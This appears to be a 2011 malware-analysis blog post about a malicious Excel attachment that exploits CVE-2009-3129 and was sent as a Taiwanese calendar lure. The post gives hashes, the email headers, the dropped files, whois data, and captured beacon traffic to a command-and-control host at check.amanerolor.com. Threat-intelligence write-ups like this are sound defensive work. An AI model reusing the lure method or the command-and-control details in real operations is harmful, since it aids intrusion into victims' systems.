Thursday, October 27, 2011

Oct 18 CVE-2009-3129 XLS 2011-10-18 101 calendar


Another day, another sample. CVE-2009-3129 XLS file from kevins19702@gmail.com, but it was actually sent by a Hinet server (I guess Gmail addresses are accepted better than Hinet)

The trojan calls home to 220.246.76.125
POST http://check.amanerolor.com:443/index.php HTTP/1.0



 



Common Vulnerabilities and Exposures (CVE)number

CVE-2009-3129 Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Office Excel Viewer 2003 SP3; Office Excel Viewer SP1 and SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a spreadsheet with a FEATHEADER record containing an invalid cbHdrData size element that affects a pointer offset, aka "Excel Featheader Record Memory Corruption Vulnerability."

  General File Information

File: 101.xls
Size: 224279
MD5:  B344B78FB07B63105A52F6ECFB0EDFB0

Download

Original Message

From: kevin [mailto: kevins19702@gmail.com]
Sent: Tuesday, October 18, 2011 4:04 AM
To:;
Subject: Fw: Forward: Fw: 101 calendar - white with


----- Original Message -----
From: Sent: Friday, September 30, 2011 9:48 AM
Subject: Forward: Fw: 101 calendar - white with
From: kevin [mailto:kevins19702@gmail.com]
Sent: Tuesday, October 18, 2011 4:04 AM
To: ;
Subject: Fw: 轉發: Fw: 101年曆--白色底

 
----- Original Message -----
From: Sent: Friday, September 30, 2011 9:48 AM
Subject: 轉發: Fw: 101年曆--白色底

 

Message Headers

Received: (qmail 25116 invoked from network); 18 Oct 2011 08:10:57 -0000
Received: from 220-130-232-133.hinet-ip.hinet.net (HELO pgmall) (220.130.232.133)
  by xxxxxxxxxxx
Message-ID: <000901cc8d6c$854b9810$3c01a8c0@pgmall>
From: "kevin" <kevins19702@gmail.com>
To: <Undisclosed-Recipient:;>
Subject: =?big5?B?Rnc6IMLgtW+hRyBGdzogMTAxpn6+5C0tpdWm4qmz?=
Date: Tue, 18 Oct 2011 16:04:11 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0005_01CC8DAF.92F7AC40"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.2001
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.2001


Automated Scans

www.virustotal.com/file-scan/report.html?id=b72208aeaed0a63b5a72e3043b50c7d3203c4776421aeb798313990f9d3aa242-1319678165




Created files

Virustotal

\Temp\101.xls - decoy  "author" kmph57
\Temp\Excel.exe



File: Excel.exe
Size: 155648
MD5:  90F252E157B6494BE831CC72CB528A0B

http://anubis.iseclab.org/?action=result&task_id=10a5cb526a31780f4b1ae7506e4a60acf

Traffic

POST http://check.amanerolor.com:443/index.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)
Host: 220.246.76.125:1292578
Content-Length: 46
Pragma: no-cache
................................FB.B..C..H.C.jHTTP/1.0 200 OK
Date: Sun, 03 Aug 2003 13:41:30 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)
Content-Length: 43
accept-type: x-wav/y-img
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
................................]...^..P..jPOST http://check.amanerolor.com:443/index.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)
Host: 220.246.76.125:1292578
Content-Length: 682
Pragma: no-cache

.new_host_9.......b.......b.........jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj.jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjK.jjjjjjjFB.B..C..H.C.jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj..\.jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj?jjjjjjjjjjjjjjjjjHTTP/1.0 200 OK
Date: Sun, 03 Aug 2003 13:41:30 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)
Content-Length: 32
accept-type: x-wav/y-img
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
................................POST http://check.amanerolor.com:443/index.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)
Host: 220.246.76.125:1292578
Content-Length: 32
Pragma: no-cache

.new_host_9..........ig.........HTTP/1.0 200 OK
Date: Sun, 03 Aug 2003 13:41:30 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)
Content-Length: 32
accept-type: x-wav/y-img
Content-Type: application/octet-stream
Proxy-Connection: keep-alive



220.246.76.125
125.76.246.220.static.netvigator.com
Host reachable, 287 ms. average

220.246.0.0 - 220.246.255.255

PCCW Limited
PO Box 9896 GPO Hong Kong
Hong Kong

NETVIGATOR ADMINISTRATORS
PO Box 9896 GPO
Hong Kong
phone: +852-2888-2888
pmaster@netvigator.com

==========================
amanerolor.com
taiwan
taipei, 999079
Taiwan

william bottle (john.fielder@hotmail.com )
+886.11111111
Fax:
taiwan
taipei, 999079
Taiwan

No comments:

Post a Comment